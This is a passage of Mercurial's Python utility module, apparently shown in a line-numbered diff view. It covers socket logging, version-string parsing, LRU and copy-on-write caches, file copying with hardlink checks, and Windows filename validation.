1056 1062 if not self.states:
1057 1063 return
1058 1064
1059 1065 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1060 1066
1061 1067 def gettimeout(self, res):
1062 1068 if not self.states:
1063 1069 return
1064 1070
1065 1071 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1066 1072
1067 1073 def setsockopt(self, res, level, optname, value):
1068 1074 if not self.states:
1069 1075 return
1070 1076
1071 1077 self.fh.write(
1072 1078 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1073 1079 % (self.name, level, optname, value, res)
1074 1080 )
1075 1081
1076 1082
1077 1083 def makeloggingsocket(
1078 1084 logh,
1079 1085 fh,
1080 1086 name,
1081 1087 reads=True,
1082 1088 writes=True,
1083 1089 states=True,
1084 1090 logdata=False,
1085 1091 logdataapis=True,
1086 1092 ):
1087 1093 """Turn a socket into a logging socket."""
1088 1094
1089 1095 observer = socketobserver(
1090 1096 logh,
1091 1097 name,
1092 1098 reads=reads,
1093 1099 writes=writes,
1094 1100 states=states,
1095 1101 logdata=logdata,
1096 1102 logdataapis=logdataapis,
1097 1103 )
1098 1104 return socketproxy(fh, observer)
1099 1105
1100 1106
1101 1107 def version():
1102 1108 """Return version information if available."""
1103 1109 try:
1104 1110 from . import __version__
1105 1111
1106 1112 return __version__.version
1107 1113 except ImportError:
1108 1114 return b'unknown'
1109 1115
1110 1116
1111 1117 def versiontuple(v=None, n=4):
1112 1118 """Parses a Mercurial version string into an N-tuple.
1113 1119
1114 1120 The version string to be parsed is specified with the ``v`` argument.
1115 1121 If it isn't defined, the current Mercurial version string will be parsed.
1116 1122
1117 1123 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1118 1124 returned values:
1119 1125
1120 1126 >>> v = b'3.6.1+190-df9b73d2d444'
1121 1127 >>> versiontuple(v, 2)
1122 1128 (3, 6)
1123 1129 >>> versiontuple(v, 3)
1124 1130 (3, 6, 1)
1125 1131 >>> versiontuple(v, 4)
1126 1132 (3, 6, 1, '190-df9b73d2d444')
1127 1133
1128 1134 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1129 1135 (3, 6, 1, '190-df9b73d2d444+20151118')
1130 1136
1131 1137 >>> v = b'3.6'
1132 1138 >>> versiontuple(v, 2)
1133 1139 (3, 6)
1134 1140 >>> versiontuple(v, 3)
1135 1141 (3, 6, None)
1136 1142 >>> versiontuple(v, 4)
1137 1143 (3, 6, None, None)
1138 1144
1139 1145 >>> v = b'3.9-rc'
1140 1146 >>> versiontuple(v, 2)
1141 1147 (3, 9)
1142 1148 >>> versiontuple(v, 3)
1143 1149 (3, 9, None)
1144 1150 >>> versiontuple(v, 4)
1145 1151 (3, 9, None, 'rc')
1146 1152
1147 1153 >>> v = b'3.9-rc+2-02a8fea4289b'
1148 1154 >>> versiontuple(v, 2)
1149 1155 (3, 9)
1150 1156 >>> versiontuple(v, 3)
1151 1157 (3, 9, None)
1152 1158 >>> versiontuple(v, 4)
1153 1159 (3, 9, None, 'rc+2-02a8fea4289b')
1154 1160
1155 1161 >>> versiontuple(b'4.6rc0')
1156 1162 (4, 6, None, 'rc0')
1157 1163 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1158 1164 (4, 6, None, 'rc0+12-425d55e54f98')
1159 1165 >>> versiontuple(b'.1.2.3')
1160 1166 (None, None, None, '.1.2.3')
1161 1167 >>> versiontuple(b'12.34..5')
1162 1168 (12, 34, None, '..5')
1163 1169 >>> versiontuple(b'1.2.3.4.5.6')
1164 1170 (1, 2, 3, '.4.5.6')
1165 1171 """
1166 1172 if not v:
1167 1173 v = version()
1168 1174 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1169 1175 if not m:
1170 1176 vparts, extra = b'', v
1171 1177 elif m.group(2):
1172 1178 vparts, extra = m.groups()
1173 1179 else:
1174 1180 vparts, extra = m.group(1), None
1175 1181
1176 1182 assert vparts is not None # help pytype
1177 1183
1178 1184 vints = []
1179 1185 for i in vparts.split(b'.'):
1180 1186 try:
1181 1187 vints.append(int(i))
1182 1188 except ValueError:
1183 1189 break
1184 1190 # (3, 6) -> (3, 6, None)
1185 1191 while len(vints) < 3:
1186 1192 vints.append(None)
1187 1193
1188 1194 if n == 2:
1189 1195 return (vints[0], vints[1])
1190 1196 if n == 3:
1191 1197 return (vints[0], vints[1], vints[2])
1192 1198 if n == 4:
1193 1199 return (vints[0], vints[1], vints[2], extra)
1194 1200
1195 1201
1196 1202 def cachefunc(func):
1197 1203 '''cache the result of function calls'''
1198 1204 # XXX doesn't handle keywords args
1199 1205 if func.__code__.co_argcount == 0:
1200 1206 listcache = []
1201 1207
1202 1208 def f():
1203 1209 if len(listcache) == 0:
1204 1210 listcache.append(func())
1205 1211 return listcache[0]
1206 1212
1207 1213 return f
1208 1214 cache = {}
1209 1215 if func.__code__.co_argcount == 1:
1210 1216 # we gain a small amount of time because
1211 1217 # we don't need to pack/unpack the list
1212 1218 def f(arg):
1213 1219 if arg not in cache:
1214 1220 cache[arg] = func(arg)
1215 1221 return cache[arg]
1216 1222
1217 1223 else:
1218 1224
1219 1225 def f(*args):
1220 1226 if args not in cache:
1221 1227 cache[args] = func(*args)
1222 1228 return cache[args]
1223 1229
1224 1230 return f
1225 1231
1226 1232
1227 1233 class cow(object):
1228 1234 """helper class to make copy-on-write easier
1229 1235
1230 1236 Call preparewrite before doing any writes.
1231 1237 """
1232 1238
1233 1239 def preparewrite(self):
1234 1240 """call this before writes, return self or a copied new object"""
1235 1241 if getattr(self, '_copied', 0):
1236 1242 self._copied -= 1
1237 1243 return self.__class__(self)
1238 1244 return self
1239 1245
1240 1246 def copy(self):
1241 1247 """always do a cheap copy"""
1242 1248 self._copied = getattr(self, '_copied', 0) + 1
1243 1249 return self
1244 1250
1245 1251
1246 1252 class sortdict(collections.OrderedDict):
1247 1253 '''a simple sorted dictionary
1248 1254
1249 1255 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1250 1256 >>> d2 = d1.copy()
1251 1257 >>> d2
1252 1258 sortdict([('a', 0), ('b', 1)])
1253 1259 >>> d2.update([(b'a', 2)])
1254 1260 >>> list(d2.keys()) # should still be in last-set order
1255 1261 ['b', 'a']
1256 1262 >>> d1.insert(1, b'a.5', 0.5)
1257 1263 >>> d1
1258 1264 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1259 1265 '''
1260 1266
1261 1267 def __setitem__(self, key, value):
1262 1268 if key in self:
1263 1269 del self[key]
1264 1270 super(sortdict, self).__setitem__(key, value)
1265 1271
1266 1272 if pycompat.ispypy:
1267 1273 # __setitem__() isn't called as of PyPy 5.8.0
1268 1274 def update(self, src):
1269 1275 if isinstance(src, dict):
1270 1276 src = pycompat.iteritems(src)
1271 1277 for k, v in src:
1272 1278 self[k] = v
1273 1279
1274 1280 def insert(self, position, key, value):
1275 1281 for (i, (k, v)) in enumerate(list(self.items())):
1276 1282 if i == position:
1277 1283 self[key] = value
1278 1284 if i >= position:
1279 1285 del self[k]
1280 1286 self[k] = v
1281 1287
1282 1288
1283 1289 class cowdict(cow, dict):
1284 1290 """copy-on-write dict
1285 1291
1286 1292 Be sure to call d = d.preparewrite() before writing to d.
1287 1293
1288 1294 >>> a = cowdict()
1289 1295 >>> a is a.preparewrite()
1290 1296 True
1291 1297 >>> b = a.copy()
1292 1298 >>> b is a
1293 1299 True
1294 1300 >>> c = b.copy()
1295 1301 >>> c is a
1296 1302 True
1297 1303 >>> a = a.preparewrite()
1298 1304 >>> b is a
1299 1305 False
1300 1306 >>> a is a.preparewrite()
1301 1307 True
1302 1308 >>> c = c.preparewrite()
1303 1309 >>> b is c
1304 1310 False
1305 1311 >>> b is b.preparewrite()
1306 1312 True
1307 1313 """
1308 1314
1309 1315
1310 1316 class cowsortdict(cow, sortdict):
1311 1317 """copy-on-write sortdict
1312 1318
1313 1319 Be sure to call d = d.preparewrite() before writing to d.
1314 1320 """
1315 1321
1316 1322
1317 1323 class transactional(object): # pytype: disable=ignored-metaclass
1318 1324 """Base class for making a transactional type into a context manager."""
1319 1325
1320 1326 __metaclass__ = abc.ABCMeta
1321 1327
1322 1328 @abc.abstractmethod
1323 1329 def close(self):
1324 1330 """Successfully closes the transaction."""
1325 1331
1326 1332 @abc.abstractmethod
1327 1333 def release(self):
1328 1334 """Marks the end of the transaction.
1329 1335
1330 1336 If the transaction has not been closed, it will be aborted.
1331 1337 """
1332 1338
1333 1339 def __enter__(self):
1334 1340 return self
1335 1341
1336 1342 def __exit__(self, exc_type, exc_val, exc_tb):
1337 1343 try:
1338 1344 if exc_type is None:
1339 1345 self.close()
1340 1346 finally:
1341 1347 self.release()
1342 1348
1343 1349
1344 1350 @contextlib.contextmanager
1345 1351 def acceptintervention(tr=None):
1346 1352 """A context manager that closes the transaction on InterventionRequired
1347 1353
1348 1354 If no transaction was provided, this simply runs the body and returns
1349 1355 """
1350 1356 if not tr:
1351 1357 yield
1352 1358 return
1353 1359 try:
1354 1360 yield
1355 1361 tr.close()
1356 1362 except error.InterventionRequired:
1357 1363 tr.close()
1358 1364 raise
1359 1365 finally:
1360 1366 tr.release()
1361 1367
1362 1368
1363 1369 @contextlib.contextmanager
1364 1370 def nullcontextmanager():
1365 1371 yield
1366 1372
1367 1373
1368 1374 class _lrucachenode(object):
1369 1375 """A node in a doubly linked list.
1370 1376
1371 1377 Holds a reference to nodes on either side as well as a key-value
1372 1378 pair for the dictionary entry.
1373 1379 """
1374 1380
1375 1381 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1376 1382
1377 1383 def __init__(self):
1378 1384 self.next = None
1379 1385 self.prev = None
1380 1386
1381 1387 self.key = _notset
1382 1388 self.value = None
1383 1389 self.cost = 0
1384 1390
1385 1391 def markempty(self):
1386 1392 """Mark the node as emptied."""
1387 1393 self.key = _notset
1388 1394 self.value = None
1389 1395 self.cost = 0
1390 1396
1391 1397
1392 1398 class lrucachedict(object):
1393 1399 """Dict that caches most recent accesses and sets.
1394 1400
1395 1401 The dict consists of an actual backing dict - indexed by original
1396 1402 key - and a doubly linked circular list defining the order of entries in
1397 1403 the cache.
1398 1404
1399 1405 The head node is the newest entry in the cache. If the cache is full,
1400 1406 we recycle head.prev and make it the new head. Cache accesses result in
1401 1407 the node being moved to before the existing head and being marked as the
1402 1408 new head node.
1403 1409
1404 1410 Items in the cache can be inserted with an optional "cost" value. This is
1405 1411 simply an integer that is specified by the caller. The cache can be queried
1406 1412 for the total cost of all items presently in the cache.
1407 1413
1408 1414 The cache can also define a maximum cost. If a cache insertion would
1409 1415 cause the total cost of the cache to go beyond the maximum cost limit,
1410 1416 nodes will be evicted to make room for the new code. This can be used
1411 1417 to e.g. set a max memory limit and associate an estimated bytes size
1412 1418 cost to each item in the cache. By default, no maximum cost is enforced.
1413 1419 """
1414 1420
1415 1421 def __init__(self, max, maxcost=0):
1416 1422 self._cache = {}
1417 1423
1418 1424 self._head = head = _lrucachenode()
1419 1425 head.prev = head
1420 1426 head.next = head
1421 1427 self._size = 1
1422 1428 self.capacity = max
1423 1429 self.totalcost = 0
1424 1430 self.maxcost = maxcost
1425 1431
1426 1432 def __len__(self):
1427 1433 return len(self._cache)
1428 1434
1429 1435 def __contains__(self, k):
1430 1436 return k in self._cache
1431 1437
1432 1438 def __iter__(self):
1433 1439 # We don't have to iterate in cache order, but why not.
1434 1440 n = self._head
1435 1441 for i in range(len(self._cache)):
1436 1442 yield n.key
1437 1443 n = n.next
1438 1444
1439 1445 def __getitem__(self, k):
1440 1446 node = self._cache[k]
1441 1447 self._movetohead(node)
1442 1448 return node.value
1443 1449
1444 1450 def insert(self, k, v, cost=0):
1445 1451 """Insert a new item in the cache with optional cost value."""
1446 1452 node = self._cache.get(k)
1447 1453 # Replace existing value and mark as newest.
1448 1454 if node is not None:
1449 1455 self.totalcost -= node.cost
1450 1456 node.value = v
1451 1457 node.cost = cost
1452 1458 self.totalcost += cost
1453 1459 self._movetohead(node)
1454 1460
1455 1461 if self.maxcost:
1456 1462 self._enforcecostlimit()
1457 1463
1458 1464 return
1459 1465
1460 1466 if self._size < self.capacity:
1461 1467 node = self._addcapacity()
1462 1468 else:
1463 1469 # Grab the last/oldest item.
1464 1470 node = self._head.prev
1465 1471
1466 1472 # At capacity. Kill the old entry.
1467 1473 if node.key is not _notset:
1468 1474 self.totalcost -= node.cost
1469 1475 del self._cache[node.key]
1470 1476
1471 1477 node.key = k
1472 1478 node.value = v
1473 1479 node.cost = cost
1474 1480 self.totalcost += cost
1475 1481 self._cache[k] = node
1476 1482 # And mark it as newest entry. No need to adjust order since it
1477 1483 # is already self._head.prev.
1478 1484 self._head = node
1479 1485
1480 1486 if self.maxcost:
1481 1487 self._enforcecostlimit()
1482 1488
1483 1489 def __setitem__(self, k, v):
1484 1490 self.insert(k, v)
1485 1491
1486 1492 def __delitem__(self, k):
1487 1493 self.pop(k)
1488 1494
1489 1495 def pop(self, k, default=_notset):
1490 1496 try:
1491 1497 node = self._cache.pop(k)
1492 1498 except KeyError:
1493 1499 if default is _notset:
1494 1500 raise
1495 1501 return default
1496 1502
1497 1503 assert node is not None # help pytype
1498 1504 value = node.value
1499 1505 self.totalcost -= node.cost
1500 1506 node.markempty()
1501 1507
1502 1508 # Temporarily mark as newest item before re-adjusting head to make
1503 1509 # this node the oldest item.
1504 1510 self._movetohead(node)
1505 1511 self._head = node.next
1506 1512
1507 1513 return value
1508 1514
1509 1515 # Additional dict methods.
1510 1516
1511 1517 def get(self, k, default=None):
1512 1518 try:
1513 1519 return self.__getitem__(k)
1514 1520 except KeyError:
1515 1521 return default
1516 1522
1517 1523 def peek(self, k, default=_notset):
1518 1524 """Get the specified item without moving it to the head
1519 1525
1520 1526 Unlike get(), this doesn't mutate the internal state. But be aware
1521 1527 that it doesn't mean peek() is thread safe.
1522 1528 """
1523 1529 try:
1524 1530 node = self._cache[k]
1525 1531 return node.value
1526 1532 except KeyError:
1527 1533 if default is _notset:
1528 1534 raise
1529 1535 return default
1530 1536
1531 1537 def clear(self):
1532 1538 n = self._head
1533 1539 while n.key is not _notset:
1534 1540 self.totalcost -= n.cost
1535 1541 n.markempty()
1536 1542 n = n.next
1537 1543
1538 1544 self._cache.clear()
1539 1545
1540 1546 def copy(self, capacity=None, maxcost=0):
1541 1547 """Create a new cache as a copy of the current one.
1542 1548
1543 1549 By default, the new cache has the same capacity as the existing one.
1544 1550 But, the cache capacity can be changed as part of performing the
1545 1551 copy.
1546 1552
1547 1553 Items in the copy have an insertion/access order matching this
1548 1554 instance.
1549 1555 """
1550 1556
1551 1557 capacity = capacity or self.capacity
1552 1558 maxcost = maxcost or self.maxcost
1553 1559 result = lrucachedict(capacity, maxcost=maxcost)
1554 1560
1555 1561 # We copy entries by iterating in oldest-to-newest order so the copy
1556 1562 # has the correct ordering.
1557 1563
1558 1564 # Find the first non-empty entry.
1559 1565 n = self._head.prev
1560 1566 while n.key is _notset and n is not self._head:
1561 1567 n = n.prev
1562 1568
1563 1569 # We could potentially skip the first N items when decreasing capacity.
1564 1570 # But let's keep it simple unless it is a performance problem.
1565 1571 for i in range(len(self._cache)):
1566 1572 result.insert(n.key, n.value, cost=n.cost)
1567 1573 n = n.prev
1568 1574
1569 1575 return result
1570 1576
1571 1577 def popoldest(self):
1572 1578 """Remove the oldest item from the cache.
1573 1579
1574 1580 Returns the (key, value) describing the removed cache entry.
1575 1581 """
1576 1582 if not self._cache:
1577 1583 return
1578 1584
1579 1585 # Walk the linked list backwards starting at tail node until we hit
1580 1586 # a non-empty node.
1581 1587 n = self._head.prev
1582 1588 while n.key is _notset:
1583 1589 n = n.prev
1584 1590
1585 1591 assert n is not None # help pytype
1586 1592
1587 1593 key, value = n.key, n.value
1588 1594
1589 1595 # And remove it from the cache and mark it as empty.
1590 1596 del self._cache[n.key]
1591 1597 self.totalcost -= n.cost
1592 1598 n.markempty()
1593 1599
1594 1600 return key, value
1595 1601
1596 1602 def _movetohead(self, node):
1597 1603 """Mark a node as the newest, making it the new head.
1598 1604
1599 1605 When a node is accessed, it becomes the freshest entry in the LRU
1600 1606 list, which is denoted by self._head.
1601 1607
1602 1608 Visually, let's make ``N`` the new head node (* denotes head):
1603 1609
1604 1610 previous/oldest <-> head <-> next/next newest
1605 1611
1606 1612 ----<->--- A* ---<->-----
1607 1613 | |
1608 1614 E <-> D <-> N <-> C <-> B
1609 1615
1610 1616 To:
1611 1617
1612 1618 ----<->--- N* ---<->-----
1613 1619 | |
1614 1620 E <-> D <-> C <-> B <-> A
1615 1621
1616 1622 This requires the following moves:
1617 1623
1618 1624 C.next = D (node.prev.next = node.next)
1619 1625 D.prev = C (node.next.prev = node.prev)
1620 1626 E.next = N (head.prev.next = node)
1621 1627 N.prev = E (node.prev = head.prev)
1622 1628 N.next = A (node.next = head)
1623 1629 A.prev = N (head.prev = node)
1624 1630 """
1625 1631 head = self._head
1626 1632 # C.next = D
1627 1633 node.prev.next = node.next
1628 1634 # D.prev = C
1629 1635 node.next.prev = node.prev
1630 1636 # N.prev = E
1631 1637 node.prev = head.prev
1632 1638 # N.next = A
1633 1639 # It is tempting to do just "head" here, however if node is
1634 1640 # adjacent to head, this will do bad things.
1635 1641 node.next = head.prev.next
1636 1642 # E.next = N
1637 1643 node.next.prev = node
1638 1644 # A.prev = N
1639 1645 node.prev.next = node
1640 1646
1641 1647 self._head = node
1642 1648
1643 1649 def _addcapacity(self):
1644 1650 """Add a node to the circular linked list.
1645 1651
1646 1652 The new node is inserted before the head node.
1647 1653 """
1648 1654 head = self._head
1649 1655 node = _lrucachenode()
1650 1656 head.prev.next = node
1651 1657 node.prev = head.prev
1652 1658 node.next = head
1653 1659 head.prev = node
1654 1660 self._size += 1
1655 1661 return node
1656 1662
1657 1663 def _enforcecostlimit(self):
1658 1664 # This should run after an insertion. It should only be called if total
1659 1665 # cost limits are being enforced.
1660 1666 # The most recently inserted node is never evicted.
1661 1667 if len(self) <= 1 or self.totalcost <= self.maxcost:
1662 1668 return
1663 1669
1664 1670 # This is logically equivalent to calling popoldest() until we
1665 1671 # free up enough cost. We don't do that since popoldest() needs
1666 1672 # to walk the linked list and doing this in a loop would be
1667 1673 # quadratic. So we find the first non-empty node and then
1668 1674 # walk nodes until we free up enough capacity.
1669 1675 #
1670 1676 # If we only removed the minimum number of nodes to free enough
1671 1677 # cost at insert time, chances are high that the next insert would
1672 1678 # also require pruning. This would effectively constitute quadratic
1673 1679 # behavior for insert-heavy workloads. To mitigate this, we set a
1674 1680 # target cost that is a percentage of the max cost. This will tend
1675 1681 # to free more nodes when the high water mark is reached, which
1676 1682 # lowers the chances of needing to prune on the subsequent insert.
1677 1683 targetcost = int(self.maxcost * 0.75)
1678 1684
1679 1685 n = self._head.prev
1680 1686 while n.key is _notset:
1681 1687 n = n.prev
1682 1688
1683 1689 while len(self) > 1 and self.totalcost > targetcost:
1684 1690 del self._cache[n.key]
1685 1691 self.totalcost -= n.cost
1686 1692 n.markempty()
1687 1693 n = n.prev
1688 1694
1689 1695
1690 1696 def lrucachefunc(func):
1691 1697 '''cache most recent results of function calls'''
1692 1698 cache = {}
1693 1699 order = collections.deque()
1694 1700 if func.__code__.co_argcount == 1:
1695 1701
1696 1702 def f(arg):
1697 1703 if arg not in cache:
1698 1704 if len(cache) > 20:
1699 1705 del cache[order.popleft()]
1700 1706 cache[arg] = func(arg)
1701 1707 else:
1702 1708 order.remove(arg)
1703 1709 order.append(arg)
1704 1710 return cache[arg]
1705 1711
1706 1712 else:
1707 1713
1708 1714 def f(*args):
1709 1715 if args not in cache:
1710 1716 if len(cache) > 20:
1711 1717 del cache[order.popleft()]
1712 1718 cache[args] = func(*args)
1713 1719 else:
1714 1720 order.remove(args)
1715 1721 order.append(args)
1716 1722 return cache[args]
1717 1723
1718 1724 return f
1719 1725
1720 1726
1721 1727 class propertycache(object):
1722 1728 def __init__(self, func):
1723 1729 self.func = func
1724 1730 self.name = func.__name__
1725 1731
1726 1732 def __get__(self, obj, type=None):
1727 1733 result = self.func(obj)
1728 1734 self.cachevalue(obj, result)
1729 1735 return result
1730 1736
1731 1737 def cachevalue(self, obj, value):
1732 1738 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1733 1739 obj.__dict__[self.name] = value
1734 1740
1735 1741
1736 1742 def clearcachedproperty(obj, prop):
1737 1743 '''clear a cached property value, if one has been set'''
1738 1744 prop = pycompat.sysstr(prop)
1739 1745 if prop in obj.__dict__:
1740 1746 del obj.__dict__[prop]
1741 1747
1742 1748
1743 1749 def increasingchunks(source, min=1024, max=65536):
1744 1750 '''return no less than min bytes per chunk while data remains,
1745 1751 doubling min after each chunk until it reaches max'''
1746 1752
1747 1753 def log2(x):
1748 1754 if not x:
1749 1755 return 0
1750 1756 i = 0
1751 1757 while x:
1752 1758 x >>= 1
1753 1759 i += 1
1754 1760 return i - 1
1755 1761
1756 1762 buf = []
1757 1763 blen = 0
1758 1764 for chunk in source:
1759 1765 buf.append(chunk)
1760 1766 blen += len(chunk)
1761 1767 if blen >= min:
1762 1768 if min < max:
1763 1769 min = min << 1
1764 1770 nmin = 1 << log2(blen)
1765 1771 if nmin > min:
1766 1772 min = nmin
1767 1773 if min > max:
1768 1774 min = max
1769 1775 yield b''.join(buf)
1770 1776 blen = 0
1771 1777 buf = []
1772 1778 if buf:
1773 1779 yield b''.join(buf)
1774 1780
1775 1781
1776 1782 def always(fn):
1777 1783 return True
1778 1784
1779 1785
1780 1786 def never(fn):
1781 1787 return False
1782 1788
1783 1789
1784 1790 def nogc(func):
1785 1791 """disable garbage collector
1786 1792
1787 1793 Python's garbage collector triggers a GC each time a certain number of
1788 1794 container objects (the number being defined by gc.get_threshold()) are
1789 1795 allocated even when marked not to be tracked by the collector. Tracking has
1790 1796 no effect on when GCs are triggered, only on what objects the GC looks
1791 1797 into. As a workaround, disable GC while building complex (huge)
1792 1798 containers.
1793 1799
1794 1800 This garbage collector issue have been fixed in 2.7. But it still affect
1795 1801 CPython's performance.
1796 1802 """
1797 1803
1798 1804 def wrapper(*args, **kwargs):
1799 1805 gcenabled = gc.isenabled()
1800 1806 gc.disable()
1801 1807 try:
1802 1808 return func(*args, **kwargs)
1803 1809 finally:
1804 1810 if gcenabled:
1805 1811 gc.enable()
1806 1812
1807 1813 return wrapper
1808 1814
1809 1815
1810 1816 if pycompat.ispypy:
1811 1817 # PyPy runs slower with gc disabled
1812 1818 nogc = lambda x: x
1813 1819
1814 1820
1815 1821 def pathto(root, n1, n2):
1816 1822 '''return the relative path from one place to another.
1817 1823 root should use os.sep to separate directories
1818 1824 n1 should use os.sep to separate directories
1819 1825 n2 should use "/" to separate directories
1820 1826 returns an os.sep-separated path.
1821 1827
1822 1828 If n1 is a relative path, it's assumed it's
1823 1829 relative to root.
1824 1830 n2 should always be relative to root.
1825 1831 '''
1826 1832 if not n1:
1827 1833 return localpath(n2)
1828 1834 if os.path.isabs(n1):
1829 1835 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1830 1836 return os.path.join(root, localpath(n2))
1831 1837 n2 = b'/'.join((pconvert(root), n2))
1832 1838 a, b = splitpath(n1), n2.split(b'/')
1833 1839 a.reverse()
1834 1840 b.reverse()
1835 1841 while a and b and a[-1] == b[-1]:
1836 1842 a.pop()
1837 1843 b.pop()
1838 1844 b.reverse()
1839 1845 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1840 1846
1841 1847
1842 1848 def checksignature(func):
1843 1849 '''wrap a function with code to check for calling errors'''
1844 1850
1845 1851 def check(*args, **kwargs):
1846 1852 try:
1847 1853 return func(*args, **kwargs)
1848 1854 except TypeError:
1849 1855 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1850 1856 raise error.SignatureError
1851 1857 raise
1852 1858
1853 1859 return check
1854 1860
1855 1861
1856 1862 # a whilelist of known filesystems where hardlink works reliably
1857 1863 _hardlinkfswhitelist = {
1858 1864 b'apfs',
1859 1865 b'btrfs',
1860 1866 b'ext2',
1861 1867 b'ext3',
1862 1868 b'ext4',
1863 1869 b'hfs',
1864 1870 b'jfs',
1865 1871 b'NTFS',
1866 1872 b'reiserfs',
1867 1873 b'tmpfs',
1868 1874 b'ufs',
1869 1875 b'xfs',
1870 1876 b'zfs',
1871 1877 }
1872 1878
1873 1879
1874 1880 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1875 1881 '''copy a file, preserving mode and optionally other stat info like
1876 1882 atime/mtime
1877 1883
1878 1884 checkambig argument is used with filestat, and is useful only if
1879 1885 destination file is guarded by any lock (e.g. repo.lock or
1880 1886 repo.wlock).
1881 1887
1882 1888 copystat and checkambig should be exclusive.
1883 1889 '''
1884 1890 assert not (copystat and checkambig)
1885 1891 oldstat = None
1886 1892 if os.path.lexists(dest):
1887 1893 if checkambig:
1888 1894 oldstat = checkambig and filestat.frompath(dest)
1889 1895 unlink(dest)
1890 1896 if hardlink:
1891 1897 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1892 1898 # unless we are confident that dest is on a whitelisted filesystem.
1893 1899 try:
1894 1900 fstype = getfstype(os.path.dirname(dest))
1895 1901 except OSError:
1896 1902 fstype = None
1897 1903 if fstype not in _hardlinkfswhitelist:
1898 1904 hardlink = False
1899 1905 if hardlink:
1900 1906 try:
1901 1907 oslink(src, dest)
1902 1908 return
1903 1909 except (IOError, OSError):
1904 1910 pass # fall back to normal copy
1905 1911 if os.path.islink(src):
1906 1912 os.symlink(os.readlink(src), dest)
1907 1913 # copytime is ignored for symlinks, but in general copytime isn't needed
1908 1914 # for them anyway
1909 1915 else:
1910 1916 try:
1911 1917 shutil.copyfile(src, dest)
1912 1918 if copystat:
1913 1919 # copystat also copies mode
1914 1920 shutil.copystat(src, dest)
1915 1921 else:
1916 1922 shutil.copymode(src, dest)
1917 1923 if oldstat and oldstat.stat:
1918 1924 newstat = filestat.frompath(dest)
1919 1925 if newstat.isambig(oldstat):
1920 1926 # stat of copied file is ambiguous to original one
1921 1927 advanced = (
1922 1928 oldstat.stat[stat.ST_MTIME] + 1
1923 1929 ) & 0x7FFFFFFF
1924 1930 os.utime(dest, (advanced, advanced))
1925 1931 except shutil.Error as inst:
1926 1932 raise error.Abort(stringutil.forcebytestr(inst))
1927 1933
1928 1934
1929 1935 def copyfiles(src, dst, hardlink=None, progress=None):
1930 1936 """Copy a directory tree using hardlinks if possible."""
1931 1937 num = 0
1932 1938
1933 1939 def settopic():
1934 1940 if progress:
1935 1941 progress.topic = _(b'linking') if hardlink else _(b'copying')
1936 1942
1937 1943 if os.path.isdir(src):
1938 1944 if hardlink is None:
1939 1945 hardlink = (
1940 1946 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1941 1947 )
1942 1948 settopic()
1943 1949 os.mkdir(dst)
1944 1950 for name, kind in listdir(src):
1945 1951 srcname = os.path.join(src, name)
1946 1952 dstname = os.path.join(dst, name)
1947 1953 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1948 1954 num += n
1949 1955 else:
1950 1956 if hardlink is None:
1951 1957 hardlink = (
1952 1958 os.stat(os.path.dirname(src)).st_dev
1953 1959 == os.stat(os.path.dirname(dst)).st_dev
1954 1960 )
1955 1961 settopic()
1956 1962
1957 1963 if hardlink:
1958 1964 try:
1959 1965 oslink(src, dst)
1960 1966 except (IOError, OSError):
1961 1967 hardlink = False
1962 1968 shutil.copy(src, dst)
1963 1969 else:
1964 1970 shutil.copy(src, dst)
1965 1971 num += 1
1966 1972 if progress:
1967 1973 progress.increment()
1968 1974
1969 1975 return hardlink, num
1970 1976
1971 1977
1972 1978 _winreservednames = {
1973 1979 b'con',
1974 1980 b'prn',
1975 1981 b'aux',
1976 1982 b'nul',
1977 1983 b'com1',
1978 1984 b'com2',
1979 1985 b'com3',
1980 1986 b'com4',
1981 1987 b'com5',
1982 1988 b'com6',
1983 1989 b'com7',
1984 1990 b'com8',
1985 1991 b'com9',
1986 1992 b'lpt1',
1987 1993 b'lpt2',
1988 1994 b'lpt3',
1989 1995 b'lpt4',
1990 1996 b'lpt5',
1991 1997 b'lpt6',
1992 1998 b'lpt7',
1993 1999 b'lpt8',
1994 2000 b'lpt9',
1995 2001 }
1996 2002 _winreservedchars = b':*?"<>|'
1997 2003
1998 2004
1999 2005 def checkwinfilename(path):
2000 2006 r'''Check that the base-relative path is a valid filename on Windows.
2001 2007 Returns None if the path is ok, or a UI string describing the problem.
2002 2008
2003 2009 >>> checkwinfilename(b"just/a/normal/path")
2004 2010 >>> checkwinfilename(b"foo/bar/con.xml")
2005 2011 "filename contains 'con', which is reserved on Windows"
2006 2012 >>> checkwinfilename(b"foo/con.xml/bar")
2007 2013 "filename contains 'con', which is reserved on Windows"
2008 2014 >>> checkwinfilename(b"foo/bar/xml.con")
2009 2015 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2010 2016 "filename contains 'AUX', which is reserved on Windows"
2011 2017 >>> checkwinfilename(b"foo/bar/bla:.txt")
2012 2018 "filename contains ':', which is reserved on Windows"
2013 2019 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2014 2020 "filename contains '\\x07', which is invalid on Windows"
2015 2021 >>> checkwinfilename(b"foo/bar/bla ")
2016 2022 "filename ends with ' ', which is not allowed on Windows"
2017 2023 >>> checkwinfilename(b"../bar")
2018 2024 >>> checkwinfilename(b"foo\\")
2019 2025 "filename ends with '\\', which is invalid on Windows"
2020 2026 >>> checkwinfilename(b"foo\\/bar")
2021 2027 "directory name ends with '\\', which is invalid on Windows"
2022 2028 '''
2023 2029 if path.endswith(b'\\'):
2024 2030 return _(b"filename ends with '\\', which is invalid on Windows")
2025 2031 if b'\\/' in path:
2026 2032 return _(b"directory name ends with '\\', which is invalid on Windows")
